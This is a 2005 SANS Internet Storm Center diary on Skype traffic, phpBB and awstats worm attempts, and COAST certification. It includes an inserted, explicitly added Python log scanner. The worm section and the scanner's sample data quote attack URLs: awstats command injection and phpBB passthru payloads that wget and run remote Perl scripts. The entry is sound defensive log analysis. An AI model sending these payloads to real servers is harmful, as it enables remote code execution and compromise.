SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-03-02

Skype; Grepping Weblogs; COAST; ISTS News

Published: 2005-03-02
Last Updated: 2005-03-03 17:32:14 UTC
by Johannes Ullrich (Version: 1)

Skype

Paul wrote about his firewall dropping a "huge amount" of packets after
Skype was installed on a host behind the firewall. He suspected a backdoored
version. Skype, a very popular Voice over IP (VoIP) application, does show
this behavior as a result of its normal operation. As explained at
http://www.skype.com/products/explained.html , Skype is a peer-to-peer
application very much like Napster and others. In order to relay the voice data,
it establishes connections with numerous peers, and it will relay traffic for these
peers even if you are not "on the phone".

phpBB worms (and awstats exploits)

We continue to receive reports about various phpBB worms. The worms attack
various vulnerabilities, some of them older ones. More recent worms will just
check random URLs, not limiting themselves to well known phpBB pages like 'viewfiles'.

awstats, another web application for which vulnerabilities were released recently, is another favorite.

Here is a quick 'grep' result from our own ISC web server.

I am using this line of shell code to extract requests of interest (the second
quoted field of each access_log line is the request line; its second
space-separated field is the requested URL; ';' flags command separators):

cut -d'"' -f2 < access_log | cut -f2 -d' ' | grep ';'

Some highlights:

/cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|

/diary.php?date=2004-12-25&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F
%3B%20cd%20/var/tmp;wget%20www.panahi.com/frame3.txt;
wget%20www.panahi.com/frame2.txt;perl%20frame3.txt;rm%20frame3.txt;
perl%20frame2.txt;rm%20frame2.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F
&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45
%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

/diary.php?date=2004-12-25&rush=echo%20_START_%3B%20cd%20/var/tmp;
wget%20www.panahi.com/frame3.txt;wget%20www.panahi.com/frame2.txt;
perl%20frame3.txt;rm%20frame3.txt;perl%20frame2.txt;rm%20frame2.txt%3B
%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527';


Adding a quick 'sort -u | wc -l' to the grep above suggests 45
unique attempts. Note that some of the URLs hit look like they were
extracted from links found on other sites, and modified to insert
the exploit.
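The grep above catches a ';' in the raw request, but the second phpBB request shows why the URL should be decoded first: the injected quote is double-encoded (%2527), so the payload only becomes readable after two decoding passes. The following is an added Python example, not from the diary, that repeats the cut/grep logic, decodes until stable, and counts unique suspicious requests; the log lines, addresses and host name are constructed for the example and modelled on the requests quoted above.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines (not real ISC server data).
# Line 4 repeats line 1 so the unique count can be checked.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Mar/2005:10:00:01 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.11 - - [02/Mar/2005:10:00:02 +0000] "GET /diary.php?date=2004-12-25&rush=echo%20_START_%3B%20cd%20/var/tmp;wget%20www.example.invalid/frame3.txt&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 1024 "-" "lwp-trivial/1.41"
192.0.2.12 - - [02/Mar/2005:10:00:03 +0000] "GET /diary.php?date=2005-03-02 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.10 - - [02/Mar/2005:10:00:04 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 200 512 "-" "Mozilla/4.0"
"""

# Same idea as cut -d'"' -f2 | cut -f2 -d' ': method, then the request target.
REQUEST_RE = re.compile(r'"([A-Z]+) (\S+) [^"]*"')

# Strings that indicate shell or PHP code in a URL, checked after decoding.
INDICATORS = (";", "|", "passthru(", "wget ", "HTTP_GET_VARS", "configdir=|")


def request_path(line):
    """Return the request target from one log line, or None if unparsable."""
    m = REQUEST_RE.search(line)
    return m.group(2) if m else None


def fully_decode(s, max_rounds=3):
    """URL-decode until stable so %2527 -> %27 -> ' is exposed (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def suspicious(path):
    """Return (decoded path, list of matched indicators in INDICATORS order)."""
    decoded = fully_decode(path)
    return decoded, [ind for ind in INDICATORS if ind in decoded]


def scan(log_text):
    """Map each unique decoded suspicious request to its indicators (sort -u)."""
    found = {}
    for line in log_text.splitlines():
        path = request_path(line)
        if path is None:
            continue
        decoded, hits = suspicious(path)
        if hits:
            found.setdefault(decoded, hits)
    return found


if __name__ == "__main__":
    for url, hits in scan(SAMPLE_LOG).items():
        print(hits, url)
```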

COAST

In a past diary, we published excerpts from an offer made by a spyware/adware
company. This letter was directed to a game software developer and included
a note that the adware maker has hopes of obtaining a "COAST Certification".
COAST was originally founded as an anti-spyware/adware organization, but has
come under some scrutiny recently, as reader Robert pointed out. As usual,
buyer beware. Flashy "seals" may not only be outright fake; in
some cases you have to look deeper to figure out what they are actually
worth.

ISTS News

A couple of alert readers noticed that the ISTS news is missing. ISTS changed
its format, and the news will be back as soon as the new parser is working.

----------

Johannes Ullrich jullrich_ATT_sans.org,

CTO SANS Internet Storm Center

------------

http://johannes.homepc.org/blog
